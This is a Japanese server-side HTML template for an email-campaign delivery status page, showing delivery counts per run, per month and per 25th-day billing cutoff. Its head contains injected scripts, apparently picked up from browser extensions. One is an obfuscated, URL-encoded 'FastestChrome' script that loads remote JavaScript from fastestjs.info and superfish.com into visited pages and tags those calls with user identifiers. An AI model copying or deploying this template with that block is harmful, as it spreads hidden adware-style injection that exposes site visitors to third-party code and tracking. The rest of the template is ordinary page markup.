﻿<!DOCTYPE html>
<html lang="ja">
<head>
<meta charset="utf-8">
<title><ers:message code="atmail.total.TitleDeliveryStatusConfirm" /> - <%=.browser_title%></title>
<link rel="stylesheet" href="<%=.sec_url%>css/layout.css" type="text/css" title="base_layout" media="screen,print">
<link rel="stylesheet" href="<%=.sec_url%>css/contents.css" type="text/css" title="base_layout" media="screen,print">
<link rel="stylesheet" href="<%=.sec_url%>css/width.css" type="text/css" title="base_layout" media="screen,print">
<script type="text/javascript" src="<%=.sec_url%>js/jquery.js"></script>
<!-- jquery ui start -->
<link type="text/css" href="<%=.sec_url%>js/jquery-ui-1.8.13.custom.css" rel="stylesheet">
<script type="text/javascript" src="<%=.sec_url%>js/jquery-ui.js"></script>
<!-- jquery ui end -->
<script type="text/javascript" src="<%=.sec_url%>js/ers_lib.js"></script>
<script type="text/javascript" src="<%=.sec_url%>js/common.js"></script>
<script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/document_iterator.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/find_proxy.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/get_html_text.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/global_constants.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/name_injection_builder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/number_injection_builder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/string_finder.js"></script><script src="chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl/change_sink.js"></script><meta name="document_iterator.js"><meta name="find_proxy.js"><meta name="get_html_text.js"><meta name="global_constants.js"><meta name="name_injection_builder.js"><meta name="number_injection_builder.js"><meta name="string_finder.js"><meta name="change_sink.js"><script type="text/javascript" src="data:text/javascript,%0D%0A(function()%7B%0D%0A%20%20%20%20var%20install_source%20%3D%20'Chrome%20Webstore'%3B%0D%0A%20%20%20%20var%20ext_name%20%3D%20'FastestChrome'%3B%0D%0A%20%20%20%20var%20install_time%20%3D%20'1325615743685'%3B%0D%0A%20%20%20%20var%20add_related_deals_pref%20%3D%20'false'%3B%0D%0A%20%20%20%20var%20ctid%20%3D%20'1_2012-01'%3B%0D%0A%0D%0A%20%20%20%20if(window!%3Dwindow.top)return%3Bvar%20blacklist%3D%5B%2Fveetle.com%2F%2C%2F1800flowers.com%2F%2C%2Fdominos.com%2F%2C%2Fsquidoo.com%2F%2C%2Fnytimes.com%2F%2C%2Fdeveloper.apple.com%2F%2C%2Fhotmail.com%2F%2C%2Fnfl.com%2F%2C%2Fgrooveshark.com%2F%2Cnew%20RegExp(%22www.google.com%2Freader%22)%2C%2Fpandora.com%2F%2C%2F.*live.com%2F%2C%2F.*battlefield.com%2F%2C%2Fpch.com%2F%5D%3Bfor(var%20i%3D0%3Bi%3Cblacklist.length%3Bi%2B%2B)if(blacklist%5Bi%5D.test(document.location.href))return%3Bvar%20hashCode%3Dfunction(a)%7Bvar%20b%3D0%3Bfor(var%20c%3D0%3Bc%3Ca.length%3Bc%2B%2B)%7Bb%3D((b%3C%3C5)-b)%2Ba.charCodeAt(c)%3Bb%3Db%26b%3B%7Dreturn%20b%3B%7D%3Bvar%20ready%3Dfunction(a)%7Bvar%20b%3Dfunction()%7Bif(window.document.body)a()%3Belse%20setTimeout(b%2C100)%3B%7D%3Bb()%3B%7D%3Bready(function()%7BsetTimeout(function()%7Bif(%2F%5Ehttp%3A%2F.test(document.location.href)%7C%7Cnew%20RegExp(%22%5Ehttps%3A%2F%2Fwww.google.com%22).test(document.location.href))%7Bvar%20a%3Dfunction(a)%7Bvar%20b%3Ddocument.createElement('script')%3Bb.type%3D'text%2Fjavascript'%3Bb.src%3Da%3Bdocument.getElementsByTagName('head')%5B0%5D.appendChild(b)%3B%7D%3Bvar%20b%3Dfunction(b)%7Bif(add_related_deals_pref%3D%3D'None'%7C%7Cadd_related_deals_pref%3D%3D'true')a('http%3A%2F%2Fi.fastestjs.info%2Ffast%2Fjavascript.js%3Fchannel%3D'%2Bb)%3B%7D%3Bvar%20c%3Dfunction(b%2Cc)%7Ba(%22https%3A%2F%2Fwww.superfish.com%2Fws%2Fsf_conduit.jsp%3Fdlsource%3D%22%2Bb%2B%22%26CTID%3D%22%2Bc%2B%22%26userId%3D%22%2B%22fastest00_%22%2Bb%2B%22_%22%2Bc%2B'_')%3B%7D%3Bvar%20d%3Dnavigator.browserLanguage%7C%7Cnavigator.language%3Bvar%20e%3D%22fastestchrome%22%3Bif(%2FChrome%2F.test(navigator.userAgent))if(ext_name%3D%3D%22Fastanium%22)e%3D%22fastanium%22%3Belse%20e%3D%22fastestchrome%22%3Belse%20if(%2FFirefox%2F.test(navigator.userAgent))e%3D%22fastestfox%22%3Belse%20if(%2FSafari%2F.test(navigator.userAgent))e%3D%22fastestsafari%22%3Belse%20if(%2FTrident%2F.test(navigator.userAgent))e%3D%22fastestie%22%3Bvar%20f%3DMath.abs(hashCode(install_time))%3Bc(e%2Cctid)%3B%7D%7D%2C500)%3B%7D)%3B%0D%0A%7D())%3B%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A"></script></head>
<body cz-shortcut-listen="true">

<!-- wrapper start -->
<div id="ERS_wrapper">

<!-- header start -->
<ers:partial file="header.htm" />
<!-- header end -->

<!-- g_navi start -->
<ers:partial file="g_navi/atmail.htm" />
<!-- g_navi end -->

<!-- container start -->
<div id="ERS_container">

<!-- sidemenu start -->
<ers:partial file="sidemenu/side.htm" partialModel=".sideModel" />
<!-- sidemenu end -->

<!-- contents start -->
	<div id="ERS_contents">

<!-- title start -->
	<div id="ERS_title">
		<h2><ers:message code="atmail.total.TitleDeliveryStatusConfirm" /></h2>
	</div>
<!-- title end -->

<!-- table start -->
	<div class="ERS_table">
		<h3><ers:message code="atmail.total.TitleDeliveryStatusConfirm" /></h3>
		<p><ers:message code="atmail.total.MessageDeliveryStatCon" /></p>
		<p><ers:message code="atmail.total.MessageDeliveryStatCon1" />

		</p>
		<div align="right"><font size="-1"><a href="<%=.sec_url%>top/atmail/asp/total.asp?sort=<%=.Model.next_sort %>" ><ers:message code="dsc_tbldsc_change_disp_order" /></a></font></div>
		<table class="side">
			<caption><ers:message code="atmail.total.MsgDeliveryStatPage" /></caption>
			<tr>
				<th class="w_80"><ers:message code="md_tblfs_processid" /></th>
				<th class="w_130"><ers:message code="dsc_tbldsc_delivery_date" /></th>
				<th class="w_130"><ers:message code="dsc_tbldsc_delivery_num" /></th>
				<th class="w_196"><ers:label code="campaign_t.active" /></th>
			</tr>

			
                <ers:isEqual src=".Model.recordCount" value="0">
				<tr><td colspan="5"><ers:message code="atmail.total.MsgNoDelvyHistory" /></td></tr>
                </ers:isEqual>

                <ers:isNotEqual src=".Model.recordCount" value="0">
                    <ers:foreach variable="mailList" src=".Model.list" roopcounter="mailList_cnt">
                        <tr>
                            <td><%=mailList.id %></td>
                            <td><%=mailList.scheduled_date %></td>
                            <td><%=mailList.total_cnt %></td>
                            <td><ers:message src="mailList.status_desc"/></td>
                        </tr>
                    </ers:foreach>
                </ers:isNotEqual>
			

		</table>
	</div>
<!-- table end -->

<!-- table start -->
	<div class="ERS_table">
		<table class="side">
			<tr>
				<th>&nbsp;</th>
				<th><ers:message code="dsc_tbldsc_delivery_num" /></th>
			</tr>

			<tr>
				<td><ers:message code="atmail.total.MsgTbldscThisMonth" /><br />（<ers:formatDate src=".Model.thisMnthFrm" value="yyyy/M/d" />-<ers:formatDate src=".Model.thisMnthTo" value="yyyy/M/d" />）</td>
                <ers:isequal src=".Model.thisMnthCnt" value="0">
                    <td><ers:message code="atmail.total.MsgTbldscDeliveryHistoryThisMonth" /></td>
                </ers:isequal>

                <ers:isNotEqual src=".Model.thisMnthCnt" value="0">
                    <td><%=.Model.thisMnthCnt %></td>
                </ers:isNotEqual>
			</tr>

		<tr>
			<td><ers:message code="atmail.total.MsgTbldscLastMonth" /><br />（<ers:formatDate src=".Model.lstMnthFrm" value="yyyy/M/d" />-<ers:formatDate src=".Model.lstMnthTo" value="yyyy/M/d" />）</td>

            <ers:isEqual src=".Model.lstMnthCnt" value="0">
			    <td><ers:message code="atmail.total.MsgTbldscDeliveryHistoryLastMonth" /></td>
            </ers:isEqual>

            <ers:isNotEqual src=".Model.lstMnthCnt" value="0">
                <td><%=.Model.lstMnthCnt %></td>
            </ers:isNotEqual>
		</tr>
<!-- ２５日締累計追加 -->

			<tr>
				<td><ers:message code="atmail.total.MsgTbldscThisMonthTo25" /><br />（<ers:formatDate src=".Model.this25Frm" value="yyyy/M/d" />-<ers:formatDate src=".Model.this25To" value="yyyy/M/d" />）</td>

                <ers:isEqual src=".Model.this25Cnt" value="0">
				    <td><ers:message code="atmail.total.MsgTbldscDeliveryHistoryThisMonth" /></td>
                </ers:isEqual>

                <ers:isNotEqual src=".Model.this25Cnt" value="0">
                    <td><%=.Model.this25Cnt %></td>
                </ers:isNotEqual>
			</tr>

		<tr>
			<td><ers:message code="atmail.total.MsgTbldscLastMonthTo25" /><br />（<ers:formatDate src=".Model.lst25Frm" value="yyyy/M/d" />-<ers:formatDate src=".Model.lst25To" value="yyyy/M/d" />）</td>

            <ers:isEqual src=".Model.lst25Cnt" value="0">
			    <td><ers:message code="atmail.total.MsgTbldscDeliveryHistoryLastMonth" /></td>
            </ers:isEqual>

            <ers:isNotEqual src=".Model.lst25Cnt" value="0">
                <td><%=.Model.lst25Cnt %></td>
            </ers:isNotEqual>

		</tr>
	</table>
</div>
<!-- table end -->



		<ers:message code="atmail.total.MsgNote" />

</form>

<!-- page_top start-->
	<div class="ERS_page_top">
		<p><a href="#ERS_wrapper"><img value="<ers:message code="common.ImageAlt">" alt="<ers:message code="common.ImageAlt">" /></a></p>
	</div>
<!-- page_top end-->

	</div>
<!-- contents end -->

<br class="release_b" />

</div>
<!-- container end -->

<!-- footer start-->
<ers:partial file="footer.htm" />
<!-- footer end -->

</div>
<!-- wrapper end -->

</body>
</html>
